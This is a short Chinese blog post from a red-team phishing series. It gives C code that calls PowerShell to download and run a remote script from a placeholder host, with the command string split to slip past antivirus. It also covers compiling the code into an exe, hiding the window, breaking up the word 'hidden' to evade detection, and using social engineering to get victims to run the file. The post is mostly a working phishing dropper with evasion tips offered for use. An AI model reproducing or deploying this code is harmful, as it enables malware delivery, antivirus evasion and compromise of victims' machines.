主页 > 网络知识 > 攻防演练对抗赛之初识文件钓鱼(4)

攻防演练对抗赛之初识文件钓鱼(4)

使用c语言的system函数去执行powershell。

#include<stdio.h> #include<stdlib.h> int main(){ system("powershell.exe "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://x.x.x.x''))';$a3="$a1,$a2";IEX(-join $a3)""); return 0; }

编译成exe文件,180kb大小。

 

攻防演练对抗赛之初识文件钓鱼

 

大部分的杀软都不会报毒。

 

攻防演练对抗赛之初识文件钓鱼

 

运行后成功上线,会留下一个黑窗口。

 

攻防演练对抗赛之初识文件钓鱼

 

可以使用 -w hidden进行隐藏执行,但hidden会报毒,可以尝试下拆分hidden进行绕过。

powershell能做的事情很多,比如免杀提权,更多的用法自行尝试。

总结

不管是宏文件还是钓鱼木马,一次成功的文件钓鱼离不开社会工程学,如何快速取得他人信任,才是难上之难。

未解决的问题:

绕过杀软隐藏真实文件后缀。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

您可能还会对这些文章感兴趣!